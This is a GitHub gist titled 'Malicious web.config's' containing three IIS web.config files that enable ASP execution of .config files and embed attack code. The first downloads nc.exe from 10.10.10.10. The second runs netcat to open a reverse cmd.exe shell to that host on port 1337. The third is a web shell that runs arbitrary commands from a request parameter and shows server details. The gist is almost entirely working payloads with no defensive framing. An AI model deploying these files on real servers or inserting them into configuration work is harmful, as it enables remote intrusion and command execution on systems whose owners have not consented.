Created
July 11, 2018 23:00
-
-
Save gazcbm/ea7206fbbad83f62080e0bbbeda77d9c to your computer and use it in GitHub Desktop.
Malicious web.config's
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> | |
| </fileExtensions> | |
| <hiddenSegments> | |
| <remove segment="web.config" /> | |
| </hiddenSegments> | |
| </requestFiltering> | |
| </security> | |
| </system.webServer> | |
| </configuration> | |
| <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! | |
| <% | |
| Response.write("-"&"->") | |
| ' Set your settings | |
| strFileURL = "http://10.10.10.10/nc.exe" | |
| strHDLocation = "C:\users\test\documents\nc.exe" | |
| ' Fetch the file | |
| Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
| objXMLHTTP.open "GET", strFileURL, false | |
| objXMLHTTP.send() | |
| If objXMLHTTP.Status = 200 Then | |
| Set objADOStream = CreateObject("ADODB.Stream") | |
| objADOStream.Open | |
| objADOStream.Type = 1 'adTypeBinary | |
| objADOStream.Write objXMLHTTP.ResponseBody | |
| objADOStream.Position = 0 'Set the stream position to the start | |
| Set objFSO = Createobject("Scripting.FileSystemObject") | |
| If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
| Set objFSO = Nothing | |
| objADOStream.SaveToFile strHDLocation | |
| objADOStream.Close | |
| Set objADOStream = Nothing | |
| End if | |
| Set objXMLHTTP = Nothing | |
| Response.write("<!-"&"-") | |
| %> | |
| --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> | |
| </fileExtensions> | |
| <hiddenSegments> | |
| <remove segment="web.config" /> | |
| </hiddenSegments> | |
| </requestFiltering> | |
| </security> | |
| </system.webServer> | |
| </configuration> | |
| <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! | |
| <% | |
| Response.write("-"&"->") | |
| Set objShell = CreateObject("WScript.Shell") | |
| objShell.Exec("c:\users\test\documents\nc.exe -d 10.10.10.10 1337 -e c:\windows\system32\cmd.exe") | |
| Response.write("<!-"&"-") | |
| %> | |
| --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> | |
| </fileExtensions> | |
| <hiddenSegments> | |
| <remove segment="web.config" /> | |
| </hiddenSegments> | |
| </requestFiltering> | |
| </security> | |
| </system.webServer> | |
| </configuration> | |
| <!-- | |
| <% Response.write("-"&"->")%> | |
| <% | |
| Set oScript = Server.CreateObject("WSCRIPT.SHELL") | |
| Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") | |
| Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") | |
| Function getCommandOutput(theCommand) | |
| Dim objShell, objCmdExec | |
| Set objShell = CreateObject("WScript.Shell") | |
| Set objCmdExec = objshell.exec(thecommand) | |
| getCommandOutput = objCmdExec.StdOut.ReadAll | |
| end Function | |
| %> | |
| <BODY> | |
| <FORM action="" method="GET"> | |
| <input type="text" name="cmd" size=45 value="<%= szCMD %>"> | |
| <input type="submit" value="Run"> | |
| </FORM> | |
| <PRE> | |
| <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> | |
| <%Response.Write(Request.ServerVariables("server_name"))%> | |
| <p> | |
| <b>The server's port:</b> | |
| <%Response.Write(Request.ServerVariables("server_port"))%> | |
| </p> | |
| <p> | |
| <b>The server's software:</b> | |
| <%Response.Write(Request.ServerVariables("server_software"))%> | |
| </p> | |
| <p> | |
| <b>The server's software:</b> | |
| <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> | |
| <% szCMD = request("cmd") | |
| thisDir = getCommandOutput("cmd /c" & szCMD) | |
| Response.Write(thisDir)%> | |
| </p> | |
| <br> | |
| </BODY> | |
| <%Response.write("<!-"&"-") %> | |
| --> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment